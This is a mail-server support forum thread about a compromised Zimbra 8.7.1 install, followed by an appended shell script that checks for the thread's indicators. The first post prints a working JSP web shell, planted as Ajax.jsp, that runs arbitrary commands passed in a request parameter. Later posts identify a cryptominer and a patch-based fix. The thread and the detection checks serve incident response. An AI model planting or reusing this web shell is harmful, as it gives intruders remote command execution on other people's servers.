zimbra not listen in 443 port

seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

zimbra not listen in 443 port

Post by seryoga_p »

Hi, some strange things are going on on my mail server

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$
Today Zimbra suddenly stopped working on port 443 with the error

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp
nginx is fine:

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$
By accident I looked at the folder /opt/zimbra/jetty/webapps/zimbra/public/

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp
There is a file Ajax.jsp modified yesterday

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>
Am I hacked?? Is there any way to restore Zimbra functionality?
phoenix
Ambassador
Posts: 27262
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: zimbra not listen in 443 port

Post by phoenix »

seryoga_p wrote: Am I hacked?? Is there any way to restore Zimbra functionality?
If you want to check then see if this applies to your server: viewtopic.php?f=15&t=65932
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.
GlooM
Advanced member
Posts: 127
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Post by GlooM »

seryoga_p wrote: Fixed:
1. Upgrade to 8.7.11
2. Patch P10
Now everything is working.
Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file /opt/zimbra/log/zmswatch?
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

GlooM wrote: Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file /opt/zimbra/log/zmswatch?
Hi, GlooM )
Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.
GlooM
Advanced member
Posts: 127
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Post by GlooM »

seryoga_p wrote: Yes, there are files zmswatch and zmswatch.out.
VirusTotal says it's a bitcoin miner.
As I understand it, the hacking technique is the same.
zmswatch is the miner, Ajax.jsp the shell?

The last patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ - there are no zmcat, l.sh and s.sh files, and less trash in /opt/zimbra/jetty/

This is probably a newer hacking technique than the one previously described in CVE-2019-9670.
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

Scanned with ClamAV:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND
It would probably be more correct to back up Zimbra, reinstall CentOS, do a fresh Zimbra install and then restore the backup, but unfortunately there is no storage space on the rented VPS to recover mail quickly (now ~80GB).
I plan to stay on this VPS until the end of the year and then move to physical hardware with Zimbra or something else.
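The two indicators this thread turns up are a recently modified JSP under the Jetty webapps tree that spawns a shell (the first post) and an executable dropped into /opt/zimbra/log (the zmswatch exchange). The following checks for both are an added example written for this page, not code from the thread or from Zimbra; the Zimbra paths are assumptions, and the fixture tree it builds for an offline run is constructed.

```shell
#!/bin/sh
# Added example, not from this thread. Paths passed in are assumptions.

# find_suspicious_jsp WEBAPPS_DIR [DAYS]
# Prints .jsp files under WEBAPPS_DIR modified within the last DAYS days
# (default 7) that call a process-spawning Java API. Exit 0 if any found.
find_suspicious_jsp() {
    webapps="$1"
    days="${2:-7}"
    # A stock page under webapps/zimbra/public/ has no reason to spawn a
    # shell; a fixed-string match keeps the search cheap and unambiguous.
    hits=$(find "$webapps" -type f -name '*.jsp' -mtime "-$days" \
        -exec grep -lF -e 'Runtime.getRuntime().exec(' \
                       -e 'ProcessBuilder(' {} \; 2>/dev/null)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# find_executables_in_log LOG_DIR
# A log directory should hold only data files; anything with the owner
# execute bit set (like zmswatch in the thread) deserves a look. Exit 0 if found.
find_executables_in_log() {
    hits=$(find "$1" -type f -perm -100 2>/dev/null)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# make_fixture: constructed sample tree so both checks can run offline.
# The "Ajax.jsp" here contains only the API name, not a working shell.
make_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/jetty/webapps/zimbra/public" "$dir/log" "$dir/empty"
    printf '<%%@ page contentType="text/html" %%>\n<html>ok</html>\n' \
        > "$dir/jetty/webapps/zimbra/public/launch.jsp"
    printf '<%% Runtime.getRuntime().exec("id"); %%>\n' \
        > "$dir/jetty/webapps/zimbra/public/Ajax.jsp"
    printf 'INFO mailbox started\n' > "$dir/log/mailbox.log"
    printf '#!/bin/sh\n' > "$dir/log/zmswatch"
    chmod 0755 "$dir/log/zmswatch"
    printf '%s\n' "$dir"
}

# Against a real install (assumed paths):
#   find_suspicious_jsp /opt/zimbra/jetty/webapps 7
#   find_executables_in_log /opt/zimbra/log
```

A hit from either check is a reason to compare the file against a clean 8.7.x install and to review mailbox.log and the nginx access log for requests to that JSP before deciding between patching in place and rebuilding.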